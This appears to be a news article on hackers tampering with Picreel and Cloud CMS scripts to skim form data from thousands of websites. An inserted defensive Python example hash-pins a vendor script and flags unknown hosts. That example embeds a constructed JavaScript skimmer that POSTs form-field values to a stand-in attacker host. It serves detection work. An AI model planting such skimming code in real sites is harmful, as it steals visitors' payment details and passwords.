
Published on May 13th, 2019


Hackers are collecting payment details, user passwords from 4,600 sites



Hackers have breached analytics service Picreel and enterprise CMS provider Cloud CMS and have modified JavaScript files on the infrastructure of these two companies to embed malicious code on over 4,600 websites, security researchers have told ZDNet.

The attack is ongoing, and the malicious scripts are still live, at the time of this article's publishing.

Both hacks were spotted by Sanguine Security founder Willem de Groot earlier today and have since been confirmed by several other security researchers.

Picreel is an analytics service that lets site owners record what visitors do and how they interact with a website, in order to analyze behavioral patterns and boost conversion rates. Picreel customers, the website owners, embed a piece of JavaScript code on their sites so that Picreel can do its job. It is this script that the hackers compromised to add malicious code.

Cloud CMS is a cloud-hosted content management system that allows users and companies to host a website on the company's servers, rather than manage one themselves. Hackers appear to have breached Cloud CMS and modified one of the CMS' standard JavaScript files.

ZDNet has reached out to both companies for comment, but we have not heard back.

Malicious code logs all data entered inside form fields

Currently, it is unknown how the hackers breached these two companies. In a Twitter conversation, de Groot told ZDNet that both hacks appear to have been carried out by the same threat actor.

The malicious code logs all content users enter inside form fields and sends the information to a server located in Panama. This includes data that users enter on checkout/payment pages, contact forms, and login sections.
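The attack above works because the site owner serves a third-party script it never looks at again, and the tampered copy quietly adds a second network destination. The following is an added example, not code from the article or from either vendor: a small audit that pins a vetted copy of an embedded script with a Subresource Integrity style hash, flags any later copy that no longer matches, and lists URL hosts in the script that are not on the owner's allowlist. The two script bodies, the host names `tracker.vendor.example` and `stats-cdn.evil.example`, and the function names are all constructed for this illustration.

```python
from __future__ import annotations

import base64
import hashlib
import re

# Constructed sample: a vendor "tracking snippet" as a site owner would embed it,
# and a tampered copy of the same file that appends a form-field skimmer posting
# to an unrelated host. Both strings were written for this example only.
KNOWN_GOOD_SCRIPT = b"""
(function(){
  var endpoint = "https://tracker.vendor.example/collect";
  document.addEventListener("click", function(e){
    navigator.sendBeacon(endpoint, JSON.stringify({t: e.target.tagName}));
  });
})();
"""

TAMPERED_SCRIPT = KNOWN_GOOD_SCRIPT + b"""
(function(){
  document.addEventListener("change", function(e){
    var x = new XMLHttpRequest();
    x.open("POST", "https://stats-cdn.evil.example/u.php");
    x.send(e.target.name + "=" + e.target.value);
  });
})();
"""

# Hosts the site owner expects this particular script to talk to (assumed allowlist).
ALLOWED_HOSTS = {"tracker.vendor.example"}

# Heuristic: URL literals embedded in the script source.
HOST_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return a Subresource Integrity value ('sha384-<base64 digest>') for content."""
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def matches_pin(content: bytes, pinned: str) -> bool:
    """True when content hashes to the pinned integrity value (algorithm taken from the pin)."""
    algorithm, _, _ = pinned.partition("-")
    return sri_hash(content, algorithm) == pinned


def unexpected_hosts(content: bytes, allowed: set[str]) -> set[str]:
    """Hosts named in URL literals inside the script that are not on the allowlist.

    A pure heuristic: a skimmer that assembles its URL at runtime will not be caught,
    so the hash pin, not this scan, is the primary control.
    """
    found = {m.group(1).decode("ascii").lower() for m in HOST_RE.finditer(content)}
    return found - {h.lower() for h in allowed}


def audit_script(content: bytes, pinned: str, allowed: set[str]) -> dict:
    """The verdict a scheduled monitoring job would act on for one fetched script."""
    return {
        "integrity": sri_hash(content),
        "pin_ok": matches_pin(content, pinned),
        "unexpected_hosts": sorted(unexpected_hosts(content, allowed)),
    }


if __name__ == "__main__":
    # The pin is taken once, when the snippet was first reviewed and approved.
    pin = sri_hash(KNOWN_GOOD_SCRIPT)
    print("pinned integrity:", pin)
    for label, body in (("known-good", KNOWN_GOOD_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(label, audit_script(body, pin, ALLOWED_HOSTS))
```

A pin mismatch on a vendor-hosted script is an alert to review, not proof of compromise, since vendors ship legitimate updates; the practical control is to pair it with a Content-Security-Policy `connect-src` that names only the hosts the page is allowed to send data to, so that a tampered script's POST to an unknown host is blocked in the browser regardless of how the URL was built.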

The malicious code embedded in the Picreel script has been seen on 1,249 websites, while the one hosted on the Cloud CMS infrastructure has been seen on 3,435 domains.

Supply-chain attacks, a growing threat for websites

In the past two years, attacks like these have become quite common. Known as supply-chain attacks, they reflect a realization by hacker groups that breaching high-profile websites directly isn't as simple as it sounds, so they have turned to the smaller businesses that provide "secondary code" to those websites, and to thousands of others: providers of chat widgets, live-support widgets, analytics services, and more.

Motivations vary depending on the group. For example, some groups have hacked third-party companies to deploy cryptojacking scripts, while others have used the same technique to deploy specialized code that steals only data entered in payment forms.

Today's attack is different because it is quite generic, targeting every form field on a website, regardless of purpose.

UPDATE: Minutes after this article's publication, we were told that the malicious code has been removed from the Cloud CMS infrastructure.
